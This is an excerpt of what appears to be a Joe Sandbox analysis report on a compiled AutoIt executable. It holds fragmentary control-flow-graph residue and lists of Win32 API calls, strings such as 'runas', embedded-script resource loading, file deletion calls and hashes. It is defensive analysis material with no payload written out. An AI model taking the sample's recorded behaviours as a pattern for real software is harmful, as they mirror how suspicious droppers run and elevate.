88522->88479 88524 ada928 InitializeCriticalSectionAndSpinCount 88523->88524 88525 ada93a 88523->88525 88524->88525 88526 ada970 ___lock_fhandle LeaveCriticalSection 88525->88526 88526->88520 88528 adaba4 __lseeki64_nolock 47 API calls 88527->88528 88531 adeaaa 88528->88531 88529 adeb00 88530 adab1e __free_osfhnd 48 API calls 88529->88530 88535 adeb08 88530->88535 88531->88529 88532 adeade 88531->88532 88533 adaba4 __lseeki64_nolock 47 API calls 88531->88533 88532->88529 88534 adaba4 __lseeki64_nolock 47 API calls 88532->88534 88536 adead5 88533->88536 88537 adeaea CloseHandle 88534->88537 88538 adeb2a 88535->88538 88541 ad7bed __dosmaperr 47 API calls 88535->88541 88539 adaba4 __lseeki64_nolock 47 API calls 88536->88539 88537->88529 88540 adeaf6 GetLastError 88537->88540 88538->88486 88539->88532 88540->88529 88541->88538 88542->88472 88543->88487 88544->88486 88545->88487 88546->88475 88547->88480 88548->88487 88549->88044 88550->88044 88551->88045 88552->88058 88553->88060 88554->88057 88555->88074 88556->88069 88558 adf8a0 __ftell_nolock 88557->88558 88559 ab40b4 GetLongPathNameW 88558->88559 88560 ab6a63 48 API calls 88559->88560 88561 ab40dc 88560->88561 88562 ab49a0 88561->88562 88563 abd7f7 48 API calls 88562->88563 88564 ab49b2 88563->88564 88565 ab660f 49 API calls 88564->88565 88566 ab49bd 88565->88566 88567 ab49c8 88566->88567 88573 b22e35 88566->88573 88568 ab64cf 48 API calls 88567->88568 88570 ab49d4 88568->88570 88609 ab28a6 88570->88609 88572 b22e4f 88573->88572 88615 acd35e 60 API calls 88573->88615 88574 ab49e7 Mailbox 88574->87913 88576 ab41a9 136 API calls 88575->88576 88577 ab415e 88576->88577 88578 b23489 88577->88578 88580 ab41a9 136 API calls 88577->88580 88579 afc396 122 API calls 88578->88579 88581 b2349e 88579->88581 88582 ab4172 88580->88582 88583 b234a2 88581->88583 88584 b234bf 88581->88584 88582->88578 88585 ab417a 88582->88585 88586 ab4252 84 API calls 88583->88586 88587 acf4ea 48 API calls 88584->88587 88588 b234aa 88585->88588 
[Control-flow graph node/edge dump omitted (Joe Sandbox graph rendering residue). Win32 APIs named as nodes in this portion of the graph: SetCurrentDirectoryW, SetFilePointerEx, ReadFile, CloseHandle, GetStringTypeW, CharUpperBuffW, CharLowerBuffW, LoadImageW, EnumResourceNamesW, RegisterClassExW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, InterlockedDecrement, GetFileAttributesW, FindFirstFileW, FindClose, GetStdHandle, CoInitialize, CreateThread, RegisterWindowMessageW, GetCurrentProcess, TerminateProcess, FreeLibrary, VirtualProtect.]

                                                              Control-flow Graph
                                                              [Graph rendering omitted (legend: Executed / Not Executed). Function adb043; APIs named in the graph: WriteFile, GetLastError, GetConsoleMode, GetConsoleCP, WideCharToMultiByte.]
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 888972794361bd1c426b9b7b7a2be11cfd2123e9c774f2a92780fc9183e2d732
                                                              • Instruction ID: 1b7ca444fb604a78aa71b021a6353c046b5048ea78ef1d3982f56db5553ec1d8
                                                              • Opcode Fuzzy Hash: 888972794361bd1c426b9b7b7a2be11cfd2123e9c774f2a92780fc9183e2d732
                                                              • Instruction Fuzzy Hash: 26324B75A12229CBCB24CF18DD816E9B7B5FB46310F1941DAE40AE7B91D7309E80CF62

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AB3AA3,?), ref: 00AB3D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,00AB3AA3,?), ref: 00AB3D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B71148,00B71130,?,?,?,?,00AB3AA3,?), ref: 00AB3DC8
                                                                • Part of subcall function 00AB6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AB3DEE,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00AB6471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,00AB3AA3,?), ref: 00AB3E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B628F4,00000010), ref: 00B21CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00B21D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B4DAB4,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00B21D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,00AB3AA3), ref: 00B21D90
                                                                • Part of subcall function 00AB3E6E: GetSysColorBrush.USER32(0000000F), ref: 00AB3E79
                                                                • Part of subcall function 00AB3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00AB3E88
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(00000063), ref: 00AB3E9E
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(000000A4), ref: 00AB3EB0
                                                                • Part of subcall function 00AB3E6E: LoadIconW.USER32(000000A2), ref: 00AB3EC2
                                                                • Part of subcall function 00AB3E6E: RegisterClassExW.USER32(?), ref: 00AB3F30
                                                                • Part of subcall function 00AB36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB36E6
                                                                • Part of subcall function 00AB36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB3707
                                                                • Part of subcall function 00AB36B8: ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB371B
                                                                • Part of subcall function 00AB36B8: ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB3724
                                                                • Part of subcall function 00AB4FFC: _memset.LIBCMT ref: 00AB5022
                                                                • Part of subcall function 00AB4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB50CB
                                                              Strings
                                                              • runas, xrefs: 00B21D84
                                                              • This is a third-party compiled AutoIt script., xrefs: 00B21CC8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3287110873
                                                              • Opcode ID: 31dc113017f5b9658889008b13de911963d1452458df417c291581f6803e9ddb
                                                              • Instruction ID: 1bdb2637c70d6144abda39b842da4a25c62e98e4b59d67075db4e86b1497feef
                                                              • Opcode Fuzzy Hash: 31dc113017f5b9658889008b13de911963d1452458df417c291581f6803e9ddb
                                                              • Instruction Fuzzy Hash: B951D432A04248AACF11ABBCED42EED7BBDEB15740F0085A5F615671A3DE748A458731

                                                              Control-flow Graph
                                                              (graph image not reproduced; legend: Executed / Not Executed. Graph nodes call GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo and FreeLibrary.)
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00ACDDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,00B4DC38,?,?), ref: 00ACDEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,00B4DC38,?,?), ref: 00ACDF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ACDF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ACDF1F
                                                              • GetSystemInfo.KERNEL32(?,00B4DC38,?,?), ref: 00ACDF29
                                                              • GetSystemInfo.KERNEL32(?,00B4DC38,?,?), ref: 00ACDF35
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: 61591a1250a54bb83b4587955d006abec8809866d82213302f2b627f2adcebf6
                                                              • Instruction ID: 02c67c9fa2f11ee0fbeec5ebddf349c603572fabc63f3fa8ce3aa796a29c2367
                                                              • Opcode Fuzzy Hash: 61591a1250a54bb83b4587955d006abec8809866d82213302f2b627f2adcebf6
                                                              • Instruction Fuzzy Hash: AF6192B180A394DBCF15DF6898C16EE7FB4AF29300B1A49EDD8499F207C634C949CB65

                                                              Control-flow Graph
                                                              (graph image not reproduced; legend: Executed / Not Executed. Graph nodes call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.)
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AB449E,?,?,00000000,00000001), ref: 00AB407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AB449E,?,?,00000000,00000001), ref: 00AB4092
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB), ref: 00B24F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB), ref: 00B24F2F
                                                              • LockResource.KERNEL32(00AB449E,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB,00000000), ref: 00B24F42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: a63be304345e6c76960396d65ed3765fc80894b93a31df9739318a5df6b7d615
                                                              • Instruction ID: 6963d87ce4ac5ea29b31a4a7681976fc8c29e77be98f891c85305f74200d462c
                                                              • Opcode Fuzzy Hash: a63be304345e6c76960396d65ed3765fc80894b93a31df9739318a5df6b7d615
                                                              • Instruction Fuzzy Hash: 18117970200741BFE7219B25EC48F6B7BBDEBC9B51F20816CF616972A1DB71DC008A21
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00B22F49), ref: 00AF6CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00AF6CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00AF6CDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: d2866a62a7f2391d72d6dead103562a056bdb93147a900556c6ef76ee1c17548
                                                              • Instruction ID: 4ce58add10726f8e0fc20cc0b841e26b52f3dc0d8f59e72d13c44e3342f8930c
                                                              • Opcode Fuzzy Hash: d2866a62a7f2391d72d6dead103562a056bdb93147a900556c6ef76ee1c17548
                                                              • Instruction Fuzzy Hash: 72E0D8318148155782106778FC0D4FD776CDA05339F200705F5B1D21D0EB70DD1046D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @
                                                              • API String ID: 3728558374-2766056989
                                                              • Opcode ID: 071482f827394284e0ade90c4dd436d58dfa4c1c9fd5fe7b4bd8b31ae2ff22d6
                                                              • Instruction ID: befc87e4db4377ce092f1fb2e21c9d3d637a6c0ff408c716700a27a5784344a1
                                                              • Opcode Fuzzy Hash: 071482f827394284e0ade90c4dd436d58dfa4c1c9fd5fe7b4bd8b31ae2ff22d6
                                                              • Instruction Fuzzy Hash: 9672BB31A042089FCF14DF98C581FAEB7B5EF48300F16C49EE90AAB251DB31AE45CB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID:
                                                              • API String ID: 3964851224-0
                                                              • Opcode ID: 03a2cdb18218c987564fab511c3b7ffb8e9c712f533fc9e88a35ac2fec6ea9e5
                                                              • Instruction ID: 015567eaa4d7b7999cfd5b27fd7dc505ba744e67829cf7138bd291bc9903dbbe
                                                              • Opcode Fuzzy Hash: 03a2cdb18218c987564fab511c3b7ffb8e9c712f533fc9e88a35ac2fec6ea9e5
                                                              • Instruction Fuzzy Hash: FF9256716083419FDB24DF18C580F6ABBE1FF88304F15885DE99A8B262DB71ED45CB92
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABE959
                                                              • timeGetTime.WINMM ref: 00ABEBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABED2E
                                                              • TranslateMessage.USER32(?), ref: 00ABED3F
                                                              • DispatchMessageW.USER32(?), ref: 00ABED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 00ABED79
                                                              • DestroyWindow.USER32 ref: 00ABED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ABED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00B25270
                                                              • TranslateMessage.USER32(?), ref: 00B259F7
                                                              • DispatchMessageW.USER32(?), ref: 00B25A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B25A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: 1ef5de0379e2dc19e4e98cb3aae1f9544fd17f536807dd9c98674e9025a965d6
                                                              • Instruction ID: b36c465e450cd3a3de6feb9f3c194415e1ec173851045dcf2eef7b81afd541be
                                                              • Opcode Fuzzy Hash: 1ef5de0379e2dc19e4e98cb3aae1f9544fd17f536807dd9c98674e9025a965d6
                                                              • Instruction Fuzzy Hash: 38628E705083409FDB24DF24D985BEA77E8FF44304F1449ADF98A9B292DB75D888CB62
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00AE5EC3
                                                              • ___createFile.LIBCMT ref: 00AE5F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AE5F2D
                                                              • __dosmaperr.LIBCMT ref: 00AE5F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE5F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AE5F6A
                                                              • __dosmaperr.LIBCMT ref: 00AE5F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE5F7C
                                                              • __set_osfhnd.LIBCMT ref: 00AE5FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE6016
                                                              • __close_nolock.LIBCMT ref: 00AE603C
                                                              • __chsize_nolock.LIBCMT ref: 00AE606C
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE6176
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE618B
                                                              • __close_nolock.LIBCMT ref: 00AE61EB
                                                                • Part of subcall function 00ADEA9C: CloseHandle.KERNELBASE(00000000,00B5EEF4,00000000,?,00AE6041,00B5EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ADEAEC
                                                                • Part of subcall function 00ADEA9C: GetLastError.KERNEL32(?,00AE6041,00B5EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ADEAF6
                                                                • Part of subcall function 00ADEA9C: __free_osfhnd.LIBCMT ref: 00ADEB03
                                                                • Part of subcall function 00ADEA9C: __dosmaperr.LIBCMT ref: 00ADEB25
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE6342
                                                              • ___createFile.LIBCMT ref: 00AE6361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AE636E
                                                              • __dosmaperr.LIBCMT ref: 00AE6375
                                                              • __free_osfhnd.LIBCMT ref: 00AE6395
                                                              • __invoke_watson.LIBCMT ref: 00AE63C3
                                                              • __wsopen_helper.LIBCMT ref: 00AE63DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 82f82e3040c705047967daf8ae326fd2618b277e11cb62492d90057148ea5aa7
                                                              • Instruction ID: 7af8bb11d260bbba862651bf0c77cf93b9f59728a92ba6ca994fed566e1f68d5
                                                              • Opcode Fuzzy Hash: 82f82e3040c705047967daf8ae326fd2618b277e11cb62492d90057148ea5aa7
                                                              • Instruction Fuzzy Hash: 06225671D0068A9FEF299F6AEC85BFD7B31EB20368F244629E5229B2D1C7358D40C751

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 00AFFA96
                                                              • _wcschr.LIBCMT ref: 00AFFAA4
                                                              • _wcscpy.LIBCMT ref: 00AFFABB
                                                              • _wcscat.LIBCMT ref: 00AFFACA
                                                              • _wcscat.LIBCMT ref: 00AFFAE8
                                                              • _wcscpy.LIBCMT ref: 00AFFB09
                                                              • __wsplitpath.LIBCMT ref: 00AFFBE6
                                                              • _wcscpy.LIBCMT ref: 00AFFC0B
                                                              • _wcscpy.LIBCMT ref: 00AFFC1D
                                                              • _wcscpy.LIBCMT ref: 00AFFC32
                                                              • _wcscat.LIBCMT ref: 00AFFC47
                                                              • _wcscat.LIBCMT ref: 00AFFC59
                                                              • _wcscat.LIBCMT ref: 00AFFC6E
                                                                • Part of subcall function 00AFBFA4: _wcscmp.LIBCMT ref: 00AFC03E
                                                                • Part of subcall function 00AFBFA4: __wsplitpath.LIBCMT ref: 00AFC083
                                                                • Part of subcall function 00AFBFA4: _wcscpy.LIBCMT ref: 00AFC096
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0A9
                                                                • Part of subcall function 00AFBFA4: __wsplitpath.LIBCMT ref: 00AFC0CE
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0E4
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                              • API String ID: 2955681530-2806939583
                                                              • Opcode ID: 9ddf7205b18a903e24049fad6a44d04c296e8b42afe98a80e033a1bed71ea542
                                                              • Instruction ID: 556b437034f517b07568586e4c1a28119ab9f1bbdce9cf3e2bdfa8369c4b6391
                                                              • Opcode Fuzzy Hash: 9ddf7205b18a903e24049fad6a44d04c296e8b42afe98a80e033a1bed71ea542
                                                              • Instruction Fuzzy Hash: 0091A4725043059FDB10EFA4C951FABB3E9BF44314F04486EFA999B292DB30EA44CB91

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00AFBDB4: __time64.LIBCMT ref: 00AFBDBE
                                                                • Part of subcall function 00AB4517: _fseek.LIBCMT ref: 00AB452F
                                                              • __wsplitpath.LIBCMT ref: 00AFC083
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscpy.LIBCMT ref: 00AFC096
                                                              • _wcscat.LIBCMT ref: 00AFC0A9
                                                              • __wsplitpath.LIBCMT ref: 00AFC0CE
                                                              • _wcscat.LIBCMT ref: 00AFC0E4
                                                              • _wcscat.LIBCMT ref: 00AFC0F7
                                                              • _wcscmp.LIBCMT ref: 00AFC03E
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC65D
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AFC2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AFC338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AFC34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AFC35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AFC371
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID: p1Mw`KNw
                                                              • API String ID: 2378138488-3626030660
                                                              • Opcode ID: f7873c81ad062ae217758de928334c4934f2bee84fa76db906ac30c380fda36b
                                                              • Instruction ID: c7198f1a09e21a5c3a5e8885836acfc07c06c6193feb7516bb8955eacd1916ed
